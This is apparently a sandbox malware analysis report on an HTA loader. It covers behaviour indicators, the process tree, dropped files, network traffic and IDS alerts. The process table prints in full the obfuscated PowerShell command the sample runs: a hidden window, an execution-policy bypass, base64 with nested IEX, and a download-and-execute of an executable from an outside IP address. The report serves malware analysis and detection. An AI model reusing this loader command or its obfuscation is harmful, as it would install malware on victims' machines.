| File name: | nextbestkissingbestthingsformebetterwaygood.hta |
| Full analysis: | https://app.any.run/tasks/bc58eee0-011b-43e5-b941-6aad63b5eb9f |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | May 16, 2025, 19:53:32 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/javascript |
| File info: | JavaScript source, ASCII text, with very long lines (37699), with no line terminators |
| MD5: | CE3C33EE170C1DE5E027CEEF2C184214 |
| SHA1: | F671ED9ECFD9A813B52DA88E530D7FC1C8D27CDA |
| SHA256: | 6DDEE61BC01DB09D1044294981F43EB8784637BEA43E19C3648E7B532E5EB3DB |
| SSDEEP: | 96:/gP4sVAGlEHB4sVcJ3RlEHbDvidfJaYWImHpW4sVRw4sV3/dlEHdwP4sVF:/gh2nPUUbDviLfnGp6QN/odwhP |
MALICIOUS
Accesses environment variables (SCRIPT)
- mshta.exe (PID: 4776)
Run PowerShell with an invisible window
- powershell.exe (PID: 7228)
Changes powershell execution policy (Bypass)
- cmd.exe (PID: 7172)
Bypass execution policy to execute commands
- powershell.exe (PID: 7228)
Starts Visual C# compiler
- powershell.exe (PID: 7228)
Request from PowerShell which ran from CMD.EXE
- powershell.exe (PID: 7228)
SUSPICIOUS
Runs shell command (SCRIPT)
- mshta.exe (PID: 4776)
Executes script without checking the security policy
- powershell.exe (PID: 7228)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 7172)
Base64-obfuscated command line is found
- cmd.exe (PID: 7172)
Starts CMD.EXE for commands execution
- mshta.exe (PID: 4776)
Possibly malicious use of IEX has been detected
- cmd.exe (PID: 7172)
The process bypasses the loading of PowerShell profile settings
- cmd.exe (PID: 7172)
Uses sleep to delay execution (POWERSHELL)
- powershell.exe (PID: 7228)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 7228)
Uses .NET C# to load dll
- powershell.exe (PID: 7228)
CSC.EXE is used to compile C# code
- csc.exe (PID: 7856)
Executable content was dropped or overwritten
- csc.exe (PID: 7856)
- powershell.exe (PID: 7228)
Potential Corporate Privacy Violation
- powershell.exe (PID: 7228)
Connects to the server without a host name
- powershell.exe (PID: 7228)
Process requests binary or script from the Internet
- powershell.exe (PID: 7228)
Executes application which crashes
- TiWorker.exe (PID: 7928)
INFO
Reads Internet Explorer settings
- mshta.exe (PID: 4776)
Found Base64 encoded reflection usage via PowerShell (YARA)
- cmd.exe (PID: 7172)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 7228)
Checks supported languages
- csc.exe (PID: 7856)
- cvtres.exe (PID: 7884)
- TiWorker.exe (PID: 7928)
Reads the machine GUID from the registry
- csc.exe (PID: 7856)
Create files in a temporary directory
- cvtres.exe (PID: 7884)
- csc.exe (PID: 7856)
- TiWorker.exe (PID: 7928)
Checks proxy server information
- powershell.exe (PID: 7228)
The sample compiled with english language support
- powershell.exe (PID: 7228)
The executable file from the user directory is run by the Powershell process
- TiWorker.exe (PID: 7928)
Reads mouse settings
- TiWorker.exe (PID: 7928)
Reads the software policy settings
- slui.exe (PID: 7328)
Creates files or folders in the user directory
- WerFault.exe (PID: 8040)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
144
Monitored processes
12
Malicious processes
3
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 4488 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4776 | "C:\Windows\SysWOW64\mshta.exe" C:\Users\admin\AppData\Local\Temp\nextbestkissingbestthingsformebetterwaygood.hta {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | C:\Windows\SysWOW64\mshta.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7172 | "C:\WINDOWS\system32\cmd.exe" "/c pOWershelL -Ex bYpAss -nOp -w 1 -C dEVIcecredEnTiALdepLoymEnT.ExE ; iex($(ieX('[SysTEm.TexT.EncodING]'+[cHAr]0X3A+[chaR]0x3a+'UTf8.GEtsTRing([SysTEm.CoNvERT]'+[cHaR]58+[CHAR]0x3A+'froMbAsE64sTrINg('+[CHar]0X22+'JHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3Y1Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFliekZDT2Z4WUxTLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzVUNuUVd2Vix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJ6ZFpkd1pkQm9oLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkc2RURHIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpxdG9aeCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuMTAzLjcuMzQvMTUwL1RpV29ya2VyLmV4ZSIsIiRlbnY6VE1QXFRpV29ya2VyLmV4ZSIsMCwwKTtzdGFyVC1zbEVlUCgzKTtJbnZPa0UtSVRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpUTVBcVGlXb3JrZXIuZXhlIg=='+[chaR]0x22+'))')))" | C:\Windows\SysWOW64\cmd.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7180 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7228 | pOWershelL -Ex bYpAss -nOp -w 1 -C dEVIcecredEnTiALdepLoymEnT.ExE ; iex($(ieX('[SysTEm.TexT.EncodING]'+[cHAr]0X3A+[chaR]0x3a+'UTf8.GEtsTRing([SysTEm.CoNvERT]'+[cHaR]58+[CHAR]0x3A+'froMbAsE64sTrINg('+[CHar]0X22+'JHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3Y1Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFliekZDT2Z4WUxTLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzVUNuUVd2Vix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJ6ZFpkd1pkQm9oLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkc2RURHIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpxdG9aeCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuMTAzLjcuMzQvMTUwL1RpV29ya2VyLmV4ZSIsIiRlbnY6VE1QXFRpV29ya2VyLmV4ZSIsMCwwKTtzdGFyVC1zbEVlUCgzKTtJbnZPa0UtSVRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpUTVBcVGlXb3JrZXIuZXhlIg=='+[chaR]0x22+'))')))" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7296 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7328 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7856 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\i00y0mif.cmdline" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
| 7884 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESE84E.tmp" "c:\Users\admin\AppData\Local\Temp\CSCFF225957169F431EBE16983ECA5E9344.TMP" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 14.32.31326.0 Modules
| |||||||||||||||
| 7928 | "C:\Users\admin\AppData\Local\Temp\TiWorker.exe" | C:\Users\admin\AppData\Local\Temp\TiWorker.exe | powershell.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 3221225477 Modules
| |||||||||||||||
Total events
11 338
Read events
11 332
Write events
6
Delete events
0
Modification events
| (PID) Process: | (4776) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (4776) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (4776) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (7228) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (7228) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (7228) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
Executable files
3
Suspicious files
7
Text files
9
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 8040 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_TiWorker.exe_55ce2d8080ff10a9f113a930f4f8ed3817cbe7e_d8632c2d_3ce5f0fa-278b-42d2-b7ef-63b4ee563217\Report.wer | — | |
MD5:— | SHA256:— | |||
| 7228 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ejblfb4w.g1w.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7228 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ee3ixiyo.wr0.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7228 | powershell.exe | C:\Users\admin\AppData\Local\Temp\i00y0mif.0.cs | text | |
MD5:D0447EFDB008A3F609D8B3B537E2AC75 | SHA256:767E86F3D2D9C4BA1178392C174CEA16BB7D5C0081DE8ED26EA48E8CF7A2AB65 | |||
| 7856 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCFF225957169F431EBE16983ECA5E9344.TMP | binary | |
MD5:FEAC0E8FD562A504D7BA00E6885EEFA9 | SHA256:F69BCD5D3964F3036DA2E32C5B91DC086D4D85BCE4853027DF990A20D8525C3F | |||
| 7228 | powershell.exe | C:\Users\admin\AppData\Local\Temp\i00y0mif.cmdline | text | |
MD5:A8E2A6D1865C76BF47504C440227BAC8 | SHA256:EA464342AAE92A7008A76B12EEB18E9AB9BDDAC4339535F26DA09AD0565F4E52 | |||
| 7228 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:CFCFDC6D7C003EBD2E892F06A48C211E | SHA256:F7961924F208232C6CAB196119FFD566E7B78B28E4F644C33F9F062C10F34E8E | |||
| 7884 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESE84E.tmp | binary | |
MD5:C537F416B6A98A8E3EE15B128D5BEE34 | SHA256:12E4962277B18FCF2B8B3EA388E9557AC110812E1ACB85F8F9C431E493735838 | |||
| 7856 | csc.exe | C:\Users\admin\AppData\Local\Temp\i00y0mif.out | text | |
MD5:661093FFEABE44A177A1C1B792FE251D | SHA256:D85E09C6B687102C7C736F71CA3C926882D3CE708AB61145985B1146E7C9EC60 | |||
| 7228 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\TiWorker[1].exe | executable | |
MD5:AD60FC98CFA36FD229FD46AABC71B260 | SHA256:C17E8C6B860A83B92AD9426113FED857076924F0DE5D7ED0E6ECACD032DF67A8 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
15
Threats
5
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5496 | MoUsoCoreWorker.exe | GET | 200 | 2.16.168.124:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
7228 | powershell.exe | GET | 200 | 146.103.7.34:80 | http://146.103.7.34/150/TiWorker.exe | unknown | — | — | malicious |
4300 | SIHClient.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
4300 | SIHClient.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 192.168.100.255:137 | — | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | 2.16.168.124:80 | crl.microsoft.com | Akamai International B.V. | RU | whitelisted |
5496 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3216 | svchost.exe | 172.211.123.248:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
6544 | svchost.exe | 20.190.160.20:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
2104 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
7228 | powershell.exe | 146.103.7.34:80 | — | — | BE | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
7228 | powershell.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |
7228 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
7228 | powershell.exe | A Network Trojan was detected | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 |
7228 | powershell.exe | A Network Trojan was detected | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 |
7228 | powershell.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |